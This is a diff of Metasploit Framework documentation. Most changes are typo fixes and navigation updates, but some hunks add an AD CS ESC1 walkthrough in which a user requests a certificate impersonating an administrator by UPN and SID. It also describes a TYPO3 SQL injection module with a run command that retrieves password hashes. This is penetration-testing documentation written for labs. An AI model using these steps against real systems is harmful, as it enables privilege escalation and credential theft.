 Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue].  For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].

-[commercial-installer]:http://metasploit.com/download
+[commercial-installer]:https://metasploit.com/download
 [kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
-[parrot-user-instructions]:https://parrotsec.org/docs/installation.html
+[parrot-user-instructions]:https://parrotsec.org/docs/category/installation
 [CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md

 [Ubuntu]:https://www.ubuntu.com/download/desktop
@@ -14,7 +14,7 @@ The following sites are great references for Git padawans and jedi alike:
 * [Git is Easier Than You Think](http://nfarina.com/post/9868516270/git-is-simpler): A nice tutorial that breaks down one Git user's experience switching from Subversion.
 * [PeepCode: Git](http://peepcode.com/products/git): A one-hour (not-free) screencast covering Git basics. Well-made and easy to follow.
 * [GitHub Flow](http://scottchacon.com/2011/08/31/github-flow.html): Another great post from Scott Chacon describing a GitHub-based workflow for projects.
-* [Getting Started with GitHub](http://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.
+* [Getting Started with GitHub](https://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.


 ## Using Git in Editors
@@ -110,8 +110,8 @@ your day-to-day workflow with Git.
 ## Git in Bash
 When using Git, it's very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you're currently on.  Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt:

-````
+```sh
 function parse_git_branch {
  git branch --no-color 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
 }
-````
+```
@@ -12,7 +12,7 @@ A fork is when you snapshot someone else's codebase into your own repo, presumab

 You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don't always have to push, you can push later or not at all, but you'll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready.  See below

-```
+```plaintext
 github.com/rapid7/metasploit-framework --> fork --> github.com/<...>/metasploit-framework
    ^                                                          |
    |                               git clone git://github.com/<...>/metasploit-framework.git
@@ -26,4 +26,4 @@ github.com/rapid7/metasploit-framework --> fork --> github.com/<...>/metasploit-
                      `--       push       <--      branch_xyz
 ```

-(Thanks to kernelsmith for this excellent description)
+(Thanks to kernelsmith for this excellent description)
@@ -198,8 +198,7 @@ Asking for: https/TSTWLPT1000000

 Tickets in the current session can be viewed like so:

-```
-
+```msf
 meterpreter > kerberos_ticket_list
 [+] Kerberos tickets found in the current session.
 [00000000] - 0x00000012 - aes256_hmac
@@ -2,7 +2,7 @@

 Since version 6.3, Metasploit has included authentication via Kerberos for multiple types of modules. Kerberos
 authentication allows Metasploit users to request and utilize Ticket Granting Tickets (TGTs) and Ticket Granting
-Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage machanism but
+Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage mechanism but
 tickets are stored able to be both exported and imported from [MIT Credential Cache][1] (CCACHE) files. A converter for
 Kirbi to and from CCACHE files is also available in the `auxiliary/admin/kerberos/ticket_converter` module.

@@ -268,7 +268,7 @@ Simultaneous Users: 16777216

 ## Using external tickets with Metasploit
 A ticket obtained outside of Metasploit can be used for authentication by setting the `${Prefix}::Krb5Ccname` option
-which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file formath. If the
+which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file format. If the
 ticket is in the Kirbi format, it must first be converted using the `auxiliary/admin/kerberos/ticket_converter` module.

 When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket
@@ -197,20 +197,26 @@ NAVIGATION_CONFIG = [
              {
                path: 'ad-certificates/overview.md',
                title: 'Overview',
-                nav_order: 0,
+                nav_order: 0
+              },
+              {
+                path: 'ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md',
+                title: 'Attacking AD CS ESC Vulnerabilities Using Metasploit',
+                nav_order: 1
+              },
+              {
+                path: '../../documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md',
+                title: 'Vulnerable cert finder',
+                nav_order: 2
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md',
+                title: 'Manage certificate templates'
              },
              {
                path: '../../documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md',
                title: 'Request certificates'
-              },
-              {
-                path: '../../documentation/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.md',
-                title: 'Vulnerable cert finder'
-              },
-              {
-                path: 'ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md',
-                title: 'Attacking AD CS ESC Vulnerabilities Using Metasploit'
-              },
+              }
            ]
          }
        ]
@@ -266,7 +272,7 @@ NAVIGATION_CONFIG = [
          {
            path: 'How-to-use-msfvenom.md',
            nav_order: 7
-          },
+          }
        ]
      },
      {
@@ -297,6 +303,10 @@ NAVIGATION_CONFIG = [
            path: 'Metasploit-Database-Support.md',
            title: 'Database Support'
          },
+          {
+            path: 'How-To-Use-Plugins.md',
+            title: 'Metasploit Plugins',
+          }
        ]
      },
      {
@@ -526,6 +536,10 @@ NAVIGATION_CONFIG = [
              {
                path: 'How-to-use-command-stagers.md'
              },
+              {
+                path: 'How-to-use-fetch-payloads.md',
+                title: 'How to use Fetch Payloads'
+              },
              {
                old_wiki_path: 'How-to-write-a-check()-method.md',
                path: 'How-to-write-a-check-method.md'
@@ -533,6 +547,9 @@ NAVIGATION_CONFIG = [
              {
                path: 'How-to-check-Microsoft-patch-levels-for-your-exploit.md'
              },
+              {
+                path: "How-to-write-a-cmd-injection-module.md"
+              }
            ]
          },
          {
@@ -21,7 +21,7 @@ Shell #1:
 [*] instance i-12345678 status: initializing
 ...
 [*] instance i-12345678 status: ok
-[*] Instance i-12345678 has IP adrress 35.12.4.1
+[*] Instance i-12345678 has IP address 35.12.4.1
 [*] Auxiliary module execution completed
 ```

@@ -56,7 +56,7 @@ can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case
 security-groups are used to open access to network ranges and specific TPC/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifyig a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port. 

 ## How it Works

@@ -126,7 +126,7 @@ Advanced Options:

 * `INSTANCE_TYPE`: The instance type
 * `MaxCount`: Maximum number of instances to launch
-* `MinCount`: Minumum number of instances to launch
+* `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
 * `SEC_GROUP_ID`: the EC2 security group to use
@@ -21,6 +21,15 @@ The certificate template to issue, e.g. "User".
 ### ALT_DNS
 Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.

+### ALT_SID
+Alternative object SID to specify in the NTDS_CA_SECURITY_EXT extension. This is useful when exploiting ESC1 on a target
+where the [KB5014754][KB5014754] patch has been applied.
+
+See the following resources for more information.
+
+* https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
+* https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d
+
 ### ALT_UPN
 Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
 format `$username@$dnsDomainName`.
@@ -112,11 +121,18 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 ### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
 In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different
 User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a
-different UPN effectively issues a certificate that can be used to authenticate as another user.
+different UPN effectively issues a certificate that can be used to authenticate as another user. If the target server
+has the [KB5014754][KB5014754] patch applied and the REG_DWORD
+`HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement` value is set to 2, then the SID for the
+account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value
+of `StrongCertificateBindingEnforcement` to 2. If the server has the patch applied, the SID will be returned in the
+issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the
+SID is not specified in the certificate, then Kerberos authentication will fail with `KDC_ERR_CERTIFICATE_MISMATCH`.

 The user must know:

 * A vulnerable certificate template, in this case `ESC1-Test`.
+* The SID of a target account, in this case `S-1-5-21-3402587289-1488798532-3618296993-1000`
 * The UPN of a target account, in this case `smcintyre@msflab.local`.

 See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
@@ -134,20 +150,25 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
 CA => msflab-DC-CA
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
 CERT_TEMPLATE => ESC1-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
 ALT_UPN => smcintyre@msflab.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set VERBOSE true
+VERBOSE => true
 msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
 [*] 192.168.159.10:445 - Binding to \cert...
 [+] 192.168.159.10:445 - Bound to \cert
-[*] 192.168.159.10:445 - Requesting a certificate...
+[*] 192.168.159.10:445 - Requesting a certificate for user aliddle - alternate UPN: smcintyre@msflab.local - digest algorithm: SHA256 - template: ESC1-Test
 [+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
 [*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
-[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608111432_default_192.168.159.10_windows.ad.cs_029062.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf6 auxiliary(admin/dcerpc/icpr_cert) > 
 ```

 ### Issue A Certificate With The *Any Purpose* EKU (AKA ESC2)
@@ -287,3 +308,5 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/dcerpc/icpr_cert) >
 ```
+
+[KB5014754]: https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
@@ -128,7 +128,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -178,8 +178,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status

 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
@@ -336,7 +336,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -386,8 +386,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status

 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
@@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul

 ## Vulnerable Application

-In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query.

 To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.

@@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin
 - [ ] Enable the news extension
 - [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
 - [ ] Enable page
- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] Verify if page is visible to unauthenticated user and note the id
 - [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
 - [ ] Username and password hash should have been retrieved

--- a/Show More
+++ b/Show More